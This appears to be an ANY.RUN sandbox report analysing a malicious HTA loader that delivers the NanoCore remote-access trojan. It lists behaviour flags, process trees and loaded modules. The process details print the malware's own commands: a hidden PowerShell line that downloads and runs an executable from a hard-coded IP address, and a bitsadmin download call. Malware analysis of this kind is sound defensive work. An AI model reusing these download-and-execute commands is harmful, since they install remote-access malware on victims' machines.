General Info

File name

jnn.hta

Full analysis
https://app.any.run/tasks/dcd85347-4731-4b1a-a04d-fded9aeda729
Verdict
Malicious activity
Analysis date
3/14/2019, 12:25:41
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

loader

autoit

rat

nanocore

Indicators:

MIME:
text/html
File info:
HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
MD5

a6d6cdc59c6507424b2aedeff46afd2b

SHA1

3d9d1169a822d2c17ba8e8f1e42794246aea8958

SHA256

bd6b52e1365e898cf42a2ae281e897884c440bd33140a264f90e34d4aae3330a

SSDEEP

48:ZKpON1CTY1zH1aKL2slzhapoeddogoioFxBZoWk0uynk3nKpON1CTY1zH1aKL2s2:ZBvaY1zUMdzBZweoBvaY1zUMdzBZwjP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • mdo.exe (PID: 3708)
  • mdo.exe (PID: 4052)
  • Hmmmm.exe (PID: 2704)
Changes the autorun value in the registry
  • mdo.exe (PID: 3708)
Downloads executable files from the Internet
  • powershell.exe (PID: 3040)
NanoCore was detected
  • RegSvcs.exe (PID: 3092)
Downloads executable files from IP
  • powershell.exe (PID: 3040)
Executes PowerShell scripts
  • mshta.exe (PID: 3500)
Uses BITADMIN.EXE for downloading application
  • mshta.exe (PID: 3500)
Connects to unusual port
  • RegSvcs.exe (PID: 3092)
Creates files in the user directory
  • powershell.exe (PID: 2920)
  • RegSvcs.exe (PID: 3092)
  • powershell.exe (PID: 3040)
Application launched itself
  • mdo.exe (PID: 4052)
Drop AutoIt3 executable file
  • Hmmmm.exe (PID: 2704)
Executable content was dropped or overwritten
  • Hmmmm.exe (PID: 2704)
  • powershell.exe (PID: 3040)
Reads settings of System Certificates
  • chrome.exe (PID: 3440)
Application launched itself
  • chrome.exe (PID: 3440)
Dropped object may contain Bitcoin addresses
  • mdo.exe (PID: 4052)
  • Hmmmm.exe (PID: 2704)
Reads internet explorer settings
  • mshta.exe (PID: 3500)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.txt
|   Text - UTF-8 encoded (100%)
EXIF
HTML
ContentType:
text/html; charset=utf-8

Screenshots

Processes

Total processes
54
Monitored processes
21
Malicious processes
6
Suspicious processes
0

Behavior graph

+
start download and start drop and start mshta.exe no specs bitsadmin.exe no specs powershell.exe hmmmm.exe mdo.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs mdo.exe #NANOCORE regsvcs.exe chrome.exe no specs bitsadmin.exe no specs powershell.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs explorer.exe no specs chrome.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3500
CMD
"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\jnn.hta"
Path
C:\Windows\System32\mshta.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft (R) HTML Application host
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msls31.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\clbcatq.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\sxs.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\profapi.dll
c:\windows\system32\bitsadmin.exe
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\jscript.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\inetcpl.cpl

PID
2600
CMD
"C:\Windows\System32\bitsadmin.exe" /transfer myFile /download /priority normal Your Binded File Direct URL C:\Users\admin\AppData\Local\Temp\text.rtf
Path
C:\Windows\System32\bitsadmin.exe
Indicators
No indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147942487
Version:
Company
Microsoft Corporation
Description
BITS administration utility
Version
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qmgrprxy.dll

PID
3040
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://141.136.44.78/jnn/jnn.exe','C:\Users\admin\AppData\Local\Temp\Hmmmm.exe');Start-Process C:\Users\admin\AppData\Local\Temp\Hmmmm.exe;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\local\temp\hmmmm.exe
c:\windows\system32\netutils.dll

PID
2704
CMD
"C:\Users\admin\AppData\Local\Temp\Hmmmm.exe"
Path
C:\Users\admin\AppData\Local\Temp\Hmmmm.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\hmmmm.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\riched32.dll
c:\windows\system32\riched20.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\users\admin\appdata\local\temp\88127361\mdo.exe
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\devrtl.dll

PID
4052
CMD
"C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe" seg=muu
Path
C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe
Indicators
No indicators
Parent process
Hmmmm.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
AutoIt Team
Description
AutoIt v3 Script
Version
3, 3, 14, 5
Modules
Image
c:\users\admin\appdata\local\temp\88127361\mdo.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
c:\windows\system32\winmm.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\psapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\winspool.drv
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll

PID
3440
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe"
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\hid.dll
c:\windows\system32\propsys.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\credui.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winusb.dll
c:\windows\system32\msi.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\mscms.dll
c:\windows\system32\wlanapi.dll
c:\windows\system32\wlanutil.dll
c:\windows\system32\audioses.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wpc.dll
c:\windows\system32\samlib.dll
c:\windows\system32\firewallapi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\winsta.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\wship6.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\imagehlp.dll

PID
3400
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x6fd100b0,0x6fd100c0,0x6fd100cc
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll

PID
3300
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3468 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ole32.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_watcher.dll

PID
3668
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=976,9579535764433420095,1709175414698601435,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=66F4D65CDE3EF04B7011C34A3CDDFA53 --mojo-platform-channel-handle=992 --ignored=" --type=renderer " /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google Inc.
Description
Google Chrome
Version
68.0.3440.106
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_child.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msdmo.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
